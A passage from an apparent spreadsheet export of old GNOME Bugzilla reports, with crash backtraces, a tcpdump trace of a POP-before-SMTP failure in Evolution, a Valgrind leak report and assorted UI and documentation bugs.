    func=0x80606bc  func_data=0x80feac8 
    args=0xbfffe018) at gtkmarshal.c:193
#9  0x404520d6 in gtk_handlers_run (handlers=0x812ec60 signal=0xbfffdfb8 
    object=0x80f5330 params=0xbfffe018 after=0) at gtksignal.c:1917
#10 0x40451537 in gtk_signal_real_emit (object=0x80f5330 signal_id=183 
    params=0xbfffe018) at gtksignal.c:1477
#11 0x4044f5ac in gtk_signal_emit (object=0x80f5330 signal_id=183)
    at gtksignal.c:552
#12 0x40422b4c in gtk_marshal_NONE__INT_POINTER (object=0x80f5330 
    func=0x8069b74  func_data=0x0 args=0xbfffe368)
    at gtkmarshal.c:504
#13 0x40451577 in gtk_signal_real_emit (object=0x80f5330 signal_id=168 
    params=0xbfffe368) at gtksignal.c:1492
#14 0x4044f5ac in gtk_signal_emit (object=0x80f5330 signal_id=168)
    at gtksignal.c:552
#15 0x400da3e4 in item_cursor_activated (eti=0x813e2e8 row=7 et=0x80f5330)
    at e-tree.c:444
#16 0x40422979 in gtk_marshal_NONE__INT (object=0x813e2e8 
    func=0x400da37c  func_data=0x80f5330 
    args=0xbfffe738) at gtkmarshal.c:240
#17 0x404520d6 in gtk_handlers_run (handlers=0x812f620 signal=0xbfffe6d8 
    object=0x813e2e8 params=0xbfffe738 after=0) at gtksignal.c:1917
#18 0x40451537 in gtk_signal_real_emit (object=0x813e2e8 signal_id=207 
    params=0xbfffe738) at gtksignal.c:1477
#19 0x4044f5ac in gtk_signal_emit (object=0x813e2e8 signal_id=207)
    at gtksignal.c:552
#20 0x400c58fc in eti_cursor_activated (selection=0x812d458 row=7 col=0 
    eti=0x813e2e8) at e-table-item.c:2313
#21 0x404229d0 in gtk_marshal_NONE__INT_INT (object=0x812d458 
    func=0x400c57ac  func_data=0x813e2e8 
    args=0xbfffeaf8) at gtkmarshal.c:284
#22 0x404520d6 in gtk_handlers_run (handlers=0x812f660 signal=0xbfffea98 
    object=0x812d458 params=0xbfffeaf8 after=0) at gtksignal.c:1917
#23 0x40451537 in gtk_signal_real_emit (object=0x812d458 signal_id=187 
    params=0xbfffeaf8) at gtksignal.c:1477
#24 0x4044f5ac in gtk_signal_emit (object=0x812d458 signal_id=187)
    at gtksignal.c:552
#25 0x40096784 in e_selection_model_do_something (selection=0x812d458 row=7 
    col=0 state=0) at e-selection-model.c:404
#26 0x400c3885 in eti_event (item=0x813e2e8 e=0xbffff288)
    at e-table-item.c:1726
#27 0x40239841 in gnome_canvas_item_marshal_signal_1 (object=0x813e2e8 
    func=0x400c352c  func_data=0x0 args=0xbfffefb8)
    at gnome-canvas.c:543
#28 0x40451577 in gtk_signal_real_emit (object=0x813e2e8 signal_id=104 
    params=0xbfffefb8) at gtksignal.c:1492
#29 0x4044f5ac in gtk_signal_emit (object=0x813e2e8 signal_id=104)
    at gtksignal.c:552
#30 0x4023d7d4 in emit_event (canvas=0x812fb68 event=0x80e5b88)
    at gnome-canvas.c:2817
#31 0x4023ddff in gnome_canvas_button (widget=0x812fb68 event=0x80e5b88)
    at gnome-canvas.c:3026
#32 0x404227d9 in gtk_marshal_BOOL__POINTER (object=0x812fb68 
    func=0x4023dc8c  func_data=0x0 args=0xbffff3e8)
    at gtkmarshal.c:28
#33 0x40451577 in gtk_signal_real_emit (object=0x812fb68 signal_id=26 
    params=0xbffff3e8) at gtksignal.c:1492
#34 0x4044f5ac in gtk_signal_emit (object=0x812fb68 signal_id=26)
    at gtksignal.c:552
#35 0x40486978 in gtk_widget_event (widget=0x812fb68 event=0x80e5b88)
    at gtkwidget.c:2864
#36 0x40422750 in gtk_propagate_event (widget=0x812fb68 event=0x80e5b88)
    at gtkmain.c:1378
#37 0x4042190d in gtk_main_do_event (event=0x80e5b88) at gtkmain.c:818
#38 0x404db12b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff7b8 user_data=0x0) at gdkevents.c:2139
#39 0x4050b055 in g_main_dispatch (dispatch_time=0xbffff7b8) at gmain.c:656
#40 0x4050b659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#41 0x4050b7e8 in g_main_run (loop=0x80e90d0) at gmain.c:935
#42 0x40421213 in gtk_main () at gtkmain.c:524
#43 0x406fdfcb in bonobo_main () at bonobo-main.c:277
#44 0x0806e32c in main () at eval.c:41
#45 0x4081d177 in __libc_start_main (main=0x806e1b0  argc=1 
    ubp_av=0xbffff95c init=0x8056298  fini=0x807d58c  
    rtld_fini=0x4000e184  stack_end=0xbffff954)
    at ../sysdeps/generic/libc-start.c:129
#0  0x408bb519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x4092b9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4064b563 in waitpid (pid=3221 stat_loc=0xbfffdb4c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffdb4c
options = 0
result = 0
oldtype = 0
#3  0x4027a28a in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 135673920
in_segv = 1
pid = 0
#4  0x40649935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135260872 esi = 135166224 ebp = 3221217056 esp = 3221217012 ebx = 135674032 edx = 0 ecx = 135674032 eax = 134742629 trapno = 14 err = 4 eip = 1082678442 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 3221217012 ss = 43 __ssh = 0 fpstate = 0xbfffdc78 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#5  
No locals.
#6  0x40885caa in strcmp () from /lib/i686/libc.so.6
No locals.
#7  0x080604c3 in e_shell_view_menu_setup () at eval.c:41
	in eval.c
ap = (void **) 0x80feac8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x80e7910 
result = 135260872
result = 135166224
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-16 18:47 -------
The original reporter (johns@johns.securant.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component baulig@suse.de.
</t>
  </si>
  <si>
    <t>johns</t>
  </si>
  <si>
    <t>EVOLUTION-241676</t>
  </si>
  <si>
    <t>Can create Run a program reminder without entering a program</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Created a new appointment in dano's Exchange personal calendar and added
one Run a program reminder without opening the Alarm Options dialog. So
there was no program entered for the alarm deamon to run. Evolution let me
add the alarm anyway. 
When the alarm triggered it popped up the standard meesage dialog.
Expected Results:
A warning like:
  You have not added a program to be run for this alarm
Additional Information:
Machine Configuration
------------------------------------------------------------------
Linux tlee 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
evolution1.3-1.3.2.99.0.200304170601-0.snap.ximian.1
ximian-connector1.3-1.3.2.0.200304170601-0.snap.ximian.1
libsoup-1.99.17.0.200304170601-0.snap.ximian.1
libgtkhtml3.0_1-3.0.2.0.200304170601-0.snap.ximian.1
libgal19-0.19.2-4
libgal2.0_2-1.99.3.99.0.200304151545-0.snap.ximian.1
gtkhtml-1.0.4-3
gtkhtml3.0-3.0.2.0.200304170601-0.snap.ximian.1
gal-0.19.2-4
evolution1.3-pilot-1.3.2.99.0.200304170601-0.snap.ximian.1
pilot-link-0.11.3-3
gnome-pilot-2.0.5.0.200304170601-0.snap.ximian.1
gnome-pilot-applet-2.0.5.0.200304170601-0.snap.ximian.1
gnome-mime-data-2.0.0-9
gtk+-1.2.10-22
gtk2-2.0.6-8
bonobo-1.0.21-1.ximian.1
libbonoboui-2.0.1-2</t>
  </si>
  <si>
    <t>NAUTILUS-88619</t>
  </si>
  <si>
    <t>[obsolete] Sidebar Panel: (Other)</t>
  </si>
  <si>
    <t>bonobo activation server files incorrect for history and notes view.</t>
  </si>
  <si>
    <t>When starting nautilus I get errors like the following:
** (nautilus:32625): WARNING **: activation failed: g_module_open of
`/opt/gtk2/lib/bonobo/bonobo/libnautilus-history-view.so' failed with
`/opt/gtk2/lib/bonobo/bonobo/libnautilus-history-view.so: cannot open
shared object file: No such file or directory'
** (nautilus:32625): WARNING **: activation failed: g_module_open of
`/opt/gtk2/lib/bonobo/bonobo/libnautilus-notes-view.so' failed with
`/opt/gtk2/lib/bonobo/bonobo/libnautilus-notes-view.so: cannot open shared
object file: No such file or directory'
This looks like a bug in the .server files for these components (the
bonobo/bonobo/ bit).  (after that the panels still fail to load due to a
missing TC_string_struct but that may just indicate that some ORBit
related thing needs rebuilding).</t>
  </si>
  <si>
    <t>GNOME-UTILS-318689</t>
  </si>
  <si>
    <t>gnome-system-log freezes if /dev/tty* is in /etc/syslog.conf</t>
  </si>
  <si>
    <t>Distribution/Version: Mandriva cooker
try adding 
*.* /dev/tty12
to /etc/syslog.conf
and start gnome-system-log : it will freeze because it tries to read the file
entirely (which will never since it is a character device).
The attached patch fixes the problem.</t>
  </si>
  <si>
    <t>JHBUILD-406497</t>
  </si>
  <si>
    <t>gnome-bluetooth depends on gob2 (gob is deprecated)</t>
  </si>
  <si>
    <t>Add gob2 (gobject generator) + dependency in gnome-bluetooth
Patch following</t>
  </si>
  <si>
    <t>RHYTHMBOX-132646</t>
  </si>
  <si>
    <t>rb_metadata_get_mime does nothing in the monkey-media backend</t>
  </si>
  <si>
    <t>To fix compilation when using monkey-media for metadatas I added an empty
stub for rb_metadata_get_mime it might be nice to implement it.</t>
  </si>
  <si>
    <t>cfergeau</t>
  </si>
  <si>
    <t>EVOLUTION-212546</t>
  </si>
  <si>
    <t>POP before SMTP authentication method is broken</t>
  </si>
  <si>
    <t>POP before STMP authentication doesn't work because the POP connection is
closed before the SMTP connection is opened.  The POP connection should
stay open until after the SMTP connection is closed.
The error reported is this:
    Error while 'Sending Test evo #10':
    RCPT TO response error: Requested action not taken: mailbox unavailible
: mail not sent
And this is a tcpdump showing the interactions (I've used a small utility
of mine that displays the contents of the packets names have been changed
to protect the guilty):
-------------------------------------------------------------------------
14:18:26.318729 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: S 1768514701:1768514701(0)
win 32120  (DF)
14:18:26.489950  CLIENT.1372: S 3258603276:3258603276(0)
ack 1768514702 win 17376 &lt;mss 1460nopwscale 0nopnoptimestamp 46537610
1360043&gt; (DF)
14:18:26.490044 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: . 1:1(0) ack 1 win 32120
 (DF)
14:18:27.011328  CLIENT.1372: P 1:39(38) ack 1 win 17376
 (DF)
+OK POP3 MAILSERVER v7.59 server ready
14:18:27.011415 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: . 1:1(0) ack 39 win 32120
 (DF)
14:18:27.011627 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: P 1:7(6) ack 39 win 32120
 (DF)
CAPA
14:18:27.183001  CLIENT.1372: P 39:81(42) ack 7 win
17376  (DF)
-ERR Unknown AUTHORIZATION state command
14:18:27.183815 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: P 7:19(12) ack 81 win
32120  (DF)
USER XXXXX
14:18:27.351287  CLIENT.1372: P 81:122(41) ack 19 win
17376  (DF)
+OK User name accepted password please
14:18:27.351560 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: P 19:34(15) ack 122 win
32120  (DF)
PASS XXXXXXXX
14:18:27.546871  CLIENT.1372: . 122:122(0) ack 34 win
17376  (DF)
14:18:27.621824  CLIENT.1372: P 122:152(30) ack 34 win
17376  (DF)
+OK Mailbox open 1 messages
14:18:27.622185 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: P 34:40(6) ack 152 win
32120  (DF)
QUIT
14:18:27.796026  CLIENT.1372: P 152:166(14) ack 40 win
17376  (DF)
+OK Sayonara
14:18:27.796301 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: F 40:40(0) ack 166 win
32120  (DF)
14:18:27.796385  CLIENT.1372: F 166:166(0) ack 40 win
17376  (DF)
14:18:27.796419 &gt; CLIENT.1372 &gt; MAILSERVER.pop3: . 41:41(0) ack 167 win
32120  (DF)
14:18:27.800256 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: S 1761745382:1761745382(0)
win 32120  (DF)
14:18:27.963063  CLIENT.1372: F 166:166(0) ack 41 win
17376  (DF)
14:18:27.967706  CLIENT.1373: S 1983048842:1983048842(0)
ack 1761745383 win 17376 &lt;mss 1460nopwscale 0nopnoptimestamp 46537760
1360187&gt; (DF)
14:18:27.967751 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: . 1:1(0) ack 1 win 32120
 (DF)
14:18:28.141483  CLIENT.1373: P 1:89(88) ack 1 win 17376
 (DF)
220 MAILSERVER ESMTP Sendmail 8.11.6/8.9.1 Sun 14 Oct 2001 21:17:02 -0700
(PDT)
14:18:28.141575 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: . 1:1(0) ack 89 win 32120
 (DF)
14:18:28.144228 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: P 1:23(22) ack 89 win
32120  (DF)
EHLO [CLIENT]
14:18:28.415674  CLIENT.1373: . 89:89(0) ack 23 win
17358  (DF)
14:18:28.443982  CLIENT.1373: P 89:255(166) ack 23 win
17376  (DF)
250-MAILSERVER Hello [CLIENT] pleased to meet
you250-ENHANCEDSTATUSCODES250-8BITMIME250-SIZE
7500000250-DSN250-ONEX250-ETRN250-XUSR250
HELP
14:18:28.444567 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: P 23:56(33) ack 255 win
32120  (DF)
MAIL FROM: 
14:18:28.617095  CLIENT.1373: P 255:300(45) ack 56 win
17376  (DF)
250 2.1.0 ... Sender ok
14:18:28.617429 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: P 56:84(28) ack 300 win
32120  (DF)
RCPT TO: 
14:18:28.879739  CLIENT.1373: P 300:339(39) ack 84 win
17376  (DF)
550 5.7.1 ... DENIED
14:18:28.880292 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: P 84:90(6) ack 339 win
32120  (DF)
QUIT
14:18:29.047055  CLIENT.1373: P 339:385(46) ack 90 win
17376  (DF)
221 2.0.0 MAILSERVER closing connection
14:18:29.047323 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: F 90:90(0) ack 385 win
32120  (DF)
14:18:29.049261  CLIENT.1373: F 385:385(0) ack 90 win
17376  (DF)
14:18:29.049334 &gt; CLIENT.1373 &gt; MAILSERVER.smtp: . 91:91(0) ack 386 win
32120  (DF)
14:18:29.215432  CLIENT.1373: F 385:385(0) ack 91 win
17376  (DF)
-------------------------------------------------------------------------
And here is a tcp dump of my custom Emacs lisp scripts sending mail.  Note
the POP3 QUIT command is not sent until after the SMTP QUIT command:
-------------------------------------------------------------------------
14:35:19.472509 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: S 2845926470:2845926470(0)
win 32120  (DF)
14:35:19.641274  CLIENT.1375: S 2081812063:2081812063(0)
ack 2845926471 win 17376 &lt;mss 1460nopwscale 0nopnoptimestamp 45994992
1458408&gt; (DF)
14:35:19.641389 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: . 1:1(0) ack 1 win 32120
 (DF)
14:35:19.809569  CLIENT.1375: P 1:20(19) ack 1 win 17376
 (DF)
+OK POP3 addr.com
14:35:19.809661 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: . 1:1(0) ack 20 win 32120
 (DF)
14:35:19.810750 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: P 1:13(12) ack 20 win
32120  (DF)
USER XXXXX
14:35:20.015456  CLIENT.1375: . 20:20(0) ack 13 win
17376  (DF)
14:35:20.479674  CLIENT.1375: P 20:61(41) ack 13 win
17376  (DF)
+OK User name accepted password please
14:35:20.480713 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: P 13:28(15) ack 61 win
32120  (DF)
PASS XXXXXXXX
14:35:20.744795  CLIENT.1375: . 61:61(0) ack 28 win
17376  (DF)
14:35:20.822468  CLIENT.1375: P 61:91(30) ack 28 win
17376  (DF)
+OK Mailbox open 1 messages
14:35:20.826410 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: S 2842529583:2842529583(0)
win 32120  (DF)
14:35:20.838242 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: . 28:28(0) ack 91 win
32120  (DF)
14:35:20.994326  CLIENT.1376: S 3519229058:3519229058(0)
ack 2842529584 win 17376 &lt;mss 1460nopwscale 0nopnoptimestamp 45995129
1458539&gt; (DF)
14:35:20.994413 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: . 1:1(0) ack 1 win 32120
 (DF)
14:35:21.177025  CLIENT.1376: P 1:89(88) ack 1 win 17376
 (DF)
220 proxy1.addr.com ESMTP Sendmail 8.11.6/8.9.1 Sun 14 Oct 2001 21:33:56
-0700 (PDT)
14:35:21.177114 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: . 1:1(0) ack 89 win 32120
 (DF)
14:35:21.178647 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 1:17(16) ack 89 win
32120  (DF)
EHLO CLIENT
14:35:21.353593  CLIENT.1376: P 89:255(166) ack 17 win
17376  (DF)
250-proxy1.addr.com Hello [CLIENT] pleased to meet
you250-ENHANCEDSTATUSCODES250-8BITMIME250-SIZE
7500000250-DSN250-ONEX250-ETRN250-XUSR250
HELP
14:35:21.357683 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 17:23(6) ack 255 win
32120  (DF)
ONEX
14:35:21.524865  CLIENT.1376: P 255:287(32) ack 23 win
17376  (DF)
250 2.0.0 Only one transaction
14:35:21.525928 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 23:29(6) ack 287 win
32120  (DF)
XUSR
14:35:21.692133  CLIENT.1376: P 287:317(30) ack 29 win
17376  (DF)
250 2.0.0 Initial submission
14:35:21.693610 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 29:71(42) ack 317 win
32120  (DF)
MAIL FROM:  SIZE=372
14:35:21.907710  CLIENT.1376: P 317:362(45) ack 71 win
17376  (DF)
250 2.1.0 ... Sender ok
14:35:21.908793 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 71:99(28) ack 362 win
32120  (DF)
RCPT TO: 
14:35:22.057143  CLIENT.1376: P 362:407(45) ack 99 win
17376  (DF)
250 2.1.5 ... Recipient ok
14:35:22.058197 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 99:105(6) ack 407 win
32120  (DF)
DATA
14:35:22.226980  CLIENT.1376: P 407:457(50) ack 105 win
17376  (DF)
354 Enter mail end with . on a line by itself
14:35:22.228143 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 105:149(44) ack 457 win
32120  (DF)
Reply-To: Hugh Emberson 
14:35:22.493640  CLIENT.1376: . 457:457(0) ack 149 win
17376  (DF)
14:35:22.493731 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 149:480(331) ack 457 win
32120  (DF)
To: hugh@tig.com.auSubject: Test POP before
SMTPFrom: Hugh Emberson Date: 15 Oct
2001 14:35:12 +1000Message-ID:
Lines: 0User-Agent:
Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Artificial
Intelligence)MIME-Version: 1.0Content-Type: text/plain
charset=us-ascii.
14:35:22.760893  CLIENT.1376: . 457:457(0) ack 480 win
17376  (DF)
14:35:22.769108  CLIENT.1376: P 457:511(54) ack 480 win
17376  (DF)
250 2.0.0 f9F4Xug38214 Message accepted for delivery
14:35:22.770312 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: P 480:486(6) ack 511 win
32120  (DF)
QUIT
14:35:22.937425  CLIENT.1376: P 511:557(46) ack 486 win
17376  (DF)
221 2.0.0 proxy1.addr.com closing connection
14:35:22.937742  CLIENT.1376: F 557:557(0) ack 486 win
17376  (DF)
14:35:22.937778 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: . 486:486(0) ack 558 win
32120  (DF)
14:35:22.938015 &gt; CLIENT.1376 &gt; MAILSERVER.smtp: F 486:486(0) ack 558 win
32120  (DF)
14:35:22.941211 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: P 28:34(6) ack 91 win
32120  (DF)
QUIT
14:35:23.105977  CLIENT.1376: . 558:558(0) ack 487 win
17376  (DF)
14:35:23.146127  CLIENT.1375: P 91:105(14) ack 34 win
17376  (DF)
+OK Sayonara
14:35:23.147544 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: F 34:34(0) ack 105 win
32120  (DF)
14:35:23.315012  CLIENT.1375: . 105:105(0) ack 35 win
17376  (DF)
14:35:23.315378  CLIENT.1375: F 105:105(0) ack 35 win
17376  (DF)
14:35:23.315418 &gt; CLIENT.1375 &gt; MAILSERVER.pop3: . 35:35(0) ack 106 win
32120  (DF)
------------------------------------------------------------------------
Cheers
Hugh</t>
  </si>
  <si>
    <t>hugh</t>
  </si>
  <si>
    <t>GTK+-313867</t>
  </si>
  <si>
    <t>leak in gdkevents-x11.c</t>
  </si>
  <si>
    <t>Valgrind reports:
==2727== 5 bytes in 1 blocks are definitely lost in loss record 206 of 7013
==2727==    at 0x1B903882: malloc (vg_replace_malloc.c:149)
==2727==    by 0x1BEA710E: XGetWindowProperty (in /usr/X11R6/lib/libX11.so.6.2)
==2727==    by 0x1BD7D1B9: fetch_net_wm_check_window (gdkevents-x11.c:2558)
==2727==    by 0x1BD7D3CB: gdk_x11_screen_supports_net_wm_hint
(gdkevents-x11.c:2708)
==2727==    by 0x1BD8C190: gdk_window_focus (gdkwindow-x11.c:2118)
==2727==    by 0x1BC87DF1: gtk_window_present_with_time (gtkwindow.c:6051)
==2727==    by 0x1BC87E63: gtk_window_present (gtkwindow.c:6007)
==2727==    by 0x8052289: update_popup (clock.c:1518)
==2727==    by 0x1C87C851: g_cclosure_marshal_VOID__VOID (gmarshal.c:77)
==2727==    by 0x1C871935: g_closure_invoke (gclosure.c:492)
==2727==    by 0x1C87FB06: signal_emit_unlocked_R (gsignal.c:2485)
==2727==    by 0x1C880E16: g_signal_emit_valist (gsignal.c:2244)
==2727==    by 0x1C8811B6: g_signal_emit (gsignal.c:2288)
==2727==    by 0x1BC34116: gtk_toggle_button_toggled (gtktogglebutton.c:342)
==2727==    by 0x1BC3448B: gtk_toggle_button_clicked (gtktogglebutton.c:475)
==2727==    by 0x1C87C851: g_cclosure_marshal_VOID__VOID (gmarshal.c:77)
==2727==    by 0x1C87134C: g_type_class_meta_marshal (gclosure.c:569)</t>
  </si>
  <si>
    <t>GIMP-WEB-155608</t>
  </si>
  <si>
    <t>http://www.gimp.org/tutorials/Lite_Quickies/ has spelling error: revel-&gt;reveal</t>
  </si>
  <si>
    <t>go to http://www.gimp.org/tutorials/Lite_Quickies/.
Text Image entry in the menu and the sub menu from the screenshot should revel 
itself.
should read:
Image entry in the menu and the sub menu from the screenshot should reveal 
itself.</t>
  </si>
  <si>
    <t>joshuat</t>
  </si>
  <si>
    <t>YELP-66334</t>
  </si>
  <si>
    <t>XSLT</t>
  </si>
  <si>
    <t>[PATCH] gnome-info2html2 can't handle *.bz2</t>
  </si>
  <si>
    <t>because
1. bzread() and gzgets() is non-compatibility.
2. The treatment of bzip occurs halfway....
            result=read_node( f line node )
f must be bf the time of using bzip2.</t>
  </si>
  <si>
    <t>dora</t>
  </si>
  <si>
    <t>GSTREAMER-159186</t>
  </si>
  <si>
    <t>[PATCH] videorate doesn't handle all colorspaces</t>
  </si>
  <si>
    <t>it has a fixed list of yuv spaces while it works for any colorspace.</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-312854</t>
  </si>
  <si>
    <t>Evolution will hang while renaming folders twice for exchange</t>
  </si>
  <si>
    <t>Please describe the problem:
Steps to reproduce:
1. Rename a folder.
2. Again try to rename the folder.
3. Evolution will hang.
Actual results:
In the evolution-exchange-storage process *** glibc detected *** corrupted
double-linked list: 0x41785838 ***
 gets printed.
Expected results:
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>twizst</t>
  </si>
  <si>
    <t>EVOLUTION-333716</t>
  </si>
  <si>
    <t>evolution should load images in html images</t>
  </si>
  <si>
    <t>Please describe the problem:
Evolution seems to ignore images attached to an email when an HTML message is
received and never load images from the internet is enabled.
They should be loaded
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>lsof</t>
  </si>
  <si>
    <t>GLIB-464259</t>
  </si>
  <si>
    <t>g_set_application_name() docs should say Since 2.2</t>
  </si>
  <si>
    <t>The documentation for g_set_application_name() at http://developer.gnome.org/doc/API/2.0/glib/glib-Miscellaneous-Utility-Functions.html#g-set-application-name should say Since 2.2 but it does not.
You can look at http://svn.gnome.org/viewcvs/glib/tags/GLIB_2_0_0/glib/gutils.c?view=markup to verify that the function does not exist in 2.0.0.
And looking at http://svn.gnome.org/viewcvs/glib/tags/GLIB_2_2_0/glib/gutils.c?view=markup
shows that it DOES exist for 2.2.0.</t>
  </si>
  <si>
    <t>GNUMERIC-407559</t>
  </si>
  <si>
    <t>pb in tsv import</t>
  </si>
  <si>
    <t>When importing a text file with fields separated by tabs two consecutive tabs are seen as one separator.
This bug was not present in 1.6.x.
Steps to reproduce the problem: open the attached file with gnumeric 1.6.3 and 1.7.7 and see the difference.</t>
  </si>
  <si>
    <t>parrenin.frederic</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-359038</t>
  </si>
  <si>
    <t>gnome-power-manager doesn't change display brightness on Vaio laptop</t>
  </si>
  <si>
    <t>Please describe the problem:
In Ubuntu Dapper (g-p-m 2.14) it works right the brightness can be changed in power preferences. In Edgy (g-p-m 2.16) it doesn't work.
Steps to reproduce:
1. Open power preferences in System -&gt; Administration
2. Change brightness
3. Look that it doesn't work
Actual results:
Nothing
Expected results:
Change brightness
Does this happen every time?
Yes
Other information:
It could be a HAL problem maybe the permissions.</t>
  </si>
  <si>
    <t>pedromj</t>
  </si>
  <si>
    <t>GTK+-59030</t>
  </si>
  <si>
    <t>tree selection finalize doesn't chain up (or chains to destroy not finalize?)</t>
  </si>
  <si>
    <t>From Tim:
static void
gtk_tree_selection_finalize (GObject *object)
{
  if (GTK_TREE_SELECTION (object)-&gt;destroy)
      (* GTK_TREE_SELECTION (object)-&gt;destroy) (GTK_TREE_SELECTION
(object)-&gt;user_data)
}
you don't chain your parent class handler here. people should really develop
with GRUNTIME_DEBUG=objects which catches those things (or maybe i should do
the instance debugging hashtable lookups upon last-unref unconditionally
for --enable-debug=yes).</t>
  </si>
  <si>
    <t>BOOKWORM-124708</t>
  </si>
  <si>
    <t>BOOKWORM</t>
  </si>
  <si>
    <t>dialog grows offscreen</t>
  </si>
  <si>
    <t>if the list of people on the book page grows so does the dialog. 
Invariably if the list is long enough the dialog gets to a size that does
not allow one to be able to create a book.</t>
  </si>
  <si>
    <t>zana</t>
  </si>
  <si>
    <t>GUCHARMAP-130614</t>
  </si>
  <si>
    <t>[UI-REVIEW] Add tooltip to menu entry</t>
  </si>
  <si>
    <t>[ As already mentioned in bug #130497 if this bug shouldn't already lead
to a suitable suggestion in the near future I'll actively try to get
comments from appropriate people. ]
According to the HIG every menu entry should have a tooltip:
http://developer.gnome.org/projects/gup/hig/1.0/desktop-integration.html#menu-item-tooltips
Comments to this bug suggesting possible wordings for such a tooltip are
highly appreciated!</t>
  </si>
  <si>
    <t>GNOME-CORE-16424</t>
  </si>
  <si>
    <t>gnome-session dies if you middle click on it.</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: normal
Version:  1.2.1
Synopsis: gnome-session dies if you middle click on it.
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.4.0-test2-ac2 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.1
libxml: 1.8.7
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
At least it does on 2.4.0-test2-ac2 on my k7-700 with RH 6.2 +
gnome-core-1.2.1-0_helix_1 .
Debugging information:
0x405298e9 in __wait4 () from /lib/libc.so.6
#0  0x405298e9 in __wait4 () from /lib/libc.so.6
#1  0x405881ec in ?? () from /lib/libc.so.6
#2  0x400850f1 in gnome_segv_handle (signum=11) at gnome-init.c:655
#3  0x404b6c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x403be39d in g_free (mem=0x6e756f73) at gmem.c:411
#5  0x80537ae in free_list (list=0x809cf98 udata=0x0) at splash.c:62
#6  0x403c6529 in g_slist_foreach (list=0x808a8c8 func=0x80537a0  
    user_data=0x0) at gslist.c:487
#7  0x80537f4 in splash_cleanup (o=0x8091630 data=0x0) at splash.c:70
#8  0x401c925d in gtk_marshal_NONE__NONE (object=0x8091630 
    func=0x80537c0  func_data=0x0 args=0xbffff270)
    at gtkmarshal.c:312
#9  0x401f69ed in gtk_handlers_run (handlers=0x806ffe0 signal=0xbffff22c 
    object=0x8091630 params=0xbffff270 after=0) at gtksignal.c:1917
#10 0x401f5e32 in gtk_signal_real_emit (object=0x8091630 signal_id=1 
    params=0xbffff270) at gtksignal.c:1477
#11 0x401f3f35 in gtk_signal_emit (object=0x8091630 signal_id=1)
    at gtksignal.c:552
#12 0x401d9b83 in gtk_object_shutdown (object=0x8091630) at gtkobject.c:255
#13 0x4022cd80 in gtk_widget_shutdown (object=0x8091630) at gtkwidget.c:4386
#14 0x4022f613 in gtk_window_shutdown (object=0x8091630) at gtkwindow.c:656
#15 0x401d9b2b in gtk_object_destroy (object=0x8091630) at gtkobject.c:246
